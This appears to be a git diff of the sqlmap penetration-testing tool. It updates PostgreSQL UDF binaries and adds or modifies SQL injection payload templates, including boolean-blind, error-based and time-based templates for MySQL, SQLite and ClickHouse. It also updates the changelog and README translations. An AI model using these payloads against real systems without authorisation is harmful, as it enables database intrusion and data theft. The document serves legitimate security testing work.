diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
index 2c2e96ca70a..e4b124fc8b3 100644
Binary files a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
index 2db355e267e..2c22afae9a2 100644
Binary files a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
index 1335862f761..ab23ee6a749 100644
Binary files a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
index bb2b6f195b5..8dae29c8336 100644
Binary files a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
index c730910de82..e5d05fc6f16 100644
Binary files a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
index 6ddad36fa41..ff31df61499 100644
Binary files a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
index 0f9bdf36280..d5576fdd8cf 100644
Binary files a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
index 0f54d5136c7..2350427f4ac 100644
Binary files a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
index a5bdf892ddc..eae84bdadd0 100644
Binary files a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
index bbe6aabf672..4a408a1ae0c 100644
Binary files a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
index a05e36e8c95..40f838b30f5 100644
Binary files a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
index 7a03c0d0def..a9b4b48c7b7 100644
Binary files a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
index eac654286bc..06aee54d778 100644
Binary files a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
index 6bfd62c07d4..67b5d34976f 100644
Binary files a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ
diff --git a/data/xml/errors.xml b/data/xml/errors.xml
index 59ae1e8e22a..4993a8ae81e 100644
--- a/data/xml/errors.xml
+++ b/data/xml/errors.xml
@@ -211,6 +211,11 @@
+
+
+
+
+
diff --git a/data/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml
index 67cf9940d10..ae8b6de95f2 100644
--- a/data/xml/payloads/boolean_blind.xml
+++ b/data/xml/payloads/boolean_blind.xml
@@ -484,18 +484,18 @@ Tag:
- MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
+ MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
1
5
1
1,2,3,8
1
- AND ([INFERENCE])*[RANDNUM]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)
- AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)
- AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
+ AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL
@@ -503,18 +503,18 @@ Tag:
- MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
+ MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
1
5
3
- 1,2,3
+ 1,2,3,8
2
- OR ([INFERENCE])*[RANDNUM]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)
- OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)
- OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
+ OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL
@@ -596,6 +596,45 @@ Tag:
Oracle
+
+
+ SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
+ 1
+ 2
+ 1
+ 1
+ 1
+ AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+ AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+
+ AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+
+ SQLite
+
+
+
+
+ SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
+ 1
+ 3
+ 3
+ 1
+ 2
+ OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+ OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+
+ OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
+
+
+ SQLite
+
+
+
diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml
index f9505522f38..9b1d2725ffe 100644
--- a/data/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
@@ -838,7 +838,7 @@
IBM DB2 OR error-based - WHERE or HAVING clause
2
4
- 1
+ 3
1
1
OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
@@ -853,6 +853,44 @@
+
+ ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
+ 2
+ 3
+ 1
+ 1,2,3,9
+ 1
+ AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
+
+ ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
+ 2
+ 4
+ 3
+ 1,2,3,9
+ 1
+ OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml
index dfd9a2d2604..21a50ce4016 100644
--- a/data/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
@@ -195,9 +195,9 @@
2
1,2,3,8,9
1
- AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -235,9 +235,9 @@
3
1,2,3,9
1
- OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -276,9 +276,9 @@
2
1,2,3,9
1
- AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
#
@@ -318,9 +318,9 @@
3
1,2,3,9
1
- OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
#
@@ -1494,6 +1494,44 @@
+
+ ClickHouse AND time-based blind (heavy query)
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
+
+ AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
+
+
+
+
+
+ ClickHouse
+
+
+
+
+ ClickHouse OR time-based blind (heavy query)
+ 5
+ 5
+ 3
+ 1,2,3
+ 1
+ OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
+
+ OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
+
+
+
+
+
+ ClickHouse
+
+
+
@@ -1607,10 +1645,10 @@
5
2
1,2,3,9
- 1
- IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])
+ 3
+ IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
- (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
+ (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
@@ -1880,7 +1918,7 @@
4
2
1,2,3,9
- 1
+ 3
(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
@@ -1900,7 +1938,7 @@
5
2
1,2,3,9
- 1
+ 3
(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
diff --git a/data/xml/queries.xml b/data/xml/queries.xml
index deda4364d9c..28b5582fad2 100644
--- a/data/xml/queries.xml
+++ b/data/xml/queries.xml
@@ -207,7 +207,7 @@
-
+
@@ -228,7 +228,7 @@
-
+
@@ -261,11 +261,11 @@
-
+
-
+
-
+
-
+
-
+
-
+
-
+
@@ -302,7 +302,7 @@
-
+
@@ -606,7 +606,7 @@
-
+
@@ -621,7 +621,7 @@
-
+
@@ -631,24 +631,24 @@
-
+
-
+
-
+
-
+
@@ -656,7 +656,7 @@
-
+
@@ -679,8 +679,8 @@
-
-
+
+
@@ -747,10 +747,10 @@
-
-
-
-
+
+
+
+
@@ -770,7 +770,7 @@
-
+
@@ -778,11 +778,11 @@
-
+
-
+
@@ -875,8 +875,8 @@
-
-
+
+
@@ -938,10 +938,10 @@
-
-
-
-
+
+
+
+
@@ -962,11 +962,11 @@
-
+
-
+
@@ -975,11 +975,11 @@
-
+
-
+
@@ -1319,6 +1319,75 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md
index 1281080c040..a6c344a34e7 100644
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@@ -1,3 +1,8 @@
+# Version 1.7 (2022-01-02)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
+
# Version 1.6 (2022-01-03)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
diff --git a/doc/THANKS.md b/doc/THANKS.md
index dc49071a915..3d5e9ec7e75 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -109,6 +109,9 @@ Alessandro Curio,
Alessio Dalla Piazza,
* for reporting a couple of bugs
+Alexis Danizan,
+* for contributing support for ClickHouse
+
Sherif El-Deeb,
* for reporting a minor bug
diff --git a/doc/translations/README-de-GER.md b/doc/translations/README-de-DE.md
similarity index 100%
rename from doc/translations/README-de-GER.md
rename to doc/translations/README-de-DE.md
diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md
index 02b7f378984..851ddd17522 100644
--- a/doc/translations/README-id-ID.md
+++ b/doc/translations/README-id-ID.md
@@ -2,21 +2,23 @@
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
-sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
+sqlmap adalah alat bantu proyek sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data.
+
+sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Alat ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
Tangkapan Layar
----
-Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
+Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
Instalasi
----
Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
-Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
+Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap):
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
@@ -25,26 +27,27 @@ sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi
Penggunaan
----
-Untuk mendapatkan daftar opsi dasar gunakan:
+Untuk mendapatkan daftar opsi dasar gunakan perintah:
python sqlmap.py -h
-Untuk mendapatkan daftar opsi lanjut gunakan:
+Untuk mendapatkan daftar opsi lanjutan gunakan perintah:
python sqlmap.py -hh
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
-Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Tautan
----
* Situs: https://sqlmap.org
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
-* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
-* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos)
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-in-HI.md b/doc/translations/README-in-HI.md
new file mode 100644
index 00000000000..623f1c7977e
--- /dev/null
+++ b/doc/translations/README-in-HI.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+
+sqlmap एक ओपन सोर्स प्रवेश परीक्षण उपकरण है जो SQL इन्जेक्शन दोषों की पहचान और उपयोग की प्रक्रिया को स्वचलित करता है और डेटाबेस सर्वरों को अधिकृत कर लेता है। इसके साथ एक शक्तिशाली पहचान इंजन, अंतिम प्रवेश परीक्षक के लिए कई निचले विशेषताएँ और डेटाबेस प्रिंट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिस्टम तक पहुँचने और आउट-ऑफ-बैंड कनेक्शन के माध्यम से ऑपरेटिंग सिस्टम पर कमांड चलाने के लिए कई बड़े रेंज के स्विच शामिल हैं।
+
+चित्रसंवाद
+----
+
+
+
+आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कुछ फीचर्स की दिखाते हुए छवियों का संग्रह देख सकते हैं।
+
+स्थापना
+----
+
+आप नवीनतम तारबाल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं।
+
+प्राथमिकत: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी क्लोन करके भी डाउनलोड कर सकते हैं:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap [Python](https://www.python.org/download/) संस्करण **2.6**, **2.7** और **3.x** पर किसी भी प्लेटफार्म पर तुरंत काम करता है।
+
+उपयोग
+----
+
+मौलिक विकल्पों और स्विच की सूची प्राप्त करने के लिए:
+
+ python sqlmap.py -h
+
+सभी विकल्पों और स्विच की सूची प्राप्त करने के लिए:
+
+ python sqlmap.py -hh
+
+आप [यहां](https://asciinema.org/a/46601) एक नमूना चलाने का पता लगा सकते हैं। sqlmap की क्षमताओं की एक अवलोकन प्राप्त करने, समर्थित फीचर्स की सूची और सभी विकल्पों और स्विच का वर्णन, साथ ही उदाहरणों के साथ, आपको [उपयोगकर्ता मैन्युअल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामर्श दिया जाता है।
+
+लिंक
+----
+
+* मुखपृष्ठ: https://sqlmap.org
+* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* संवाद आरएसएस फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* समस्या ट्रैकर: https://github.com/sqlmapproject/sqlmap/issues
+* उपयोगकर्ता मैन्युअल: https://github.com/sqlmapproject/sqlmap/wiki
+* अक्सर पूछे जाने वाले प्रश्न (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* ट्विटर: [@sqlmap](https://twitter.com/sqlmap)
+* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* स्क्रीनशॉट: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+*
diff --git a/doc/translations/README-ru-RUS.md b/doc/translations/README-ru-RU.md
similarity index 100%
rename from doc/translations/README-ru-RUS.md
rename to doc/translations/README-ru-RU.md
diff --git a/doc/translations/README-sk-SK.md b/doc/translations/README-sk-SK.md
new file mode 100644
index 00000000000..1adc31000cc
--- /dev/null
+++ b/doc/translations/README-sk-SK.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+
+sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.
+
+Snímky obrazovky
+----
+
+
+
+Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.
+
+Inštalácia
+----
+
+Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.
+
+Využitie
+----
+
+Na získanie zoznamu základných možností a prepínačov, použite:
+
+ python sqlmap.py -h
+
+Na získanie zoznamu všetkých možností a prepínačov, použite:
+
+ python sqlmap.py -hh
+
+Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
+Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Linky
+----
+
+* Domovská stránka: https://sqlmap.org
+* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
+* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
+* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
\ No newline at end of file
diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md
index cf60143f2e9..5951d109e52 100644
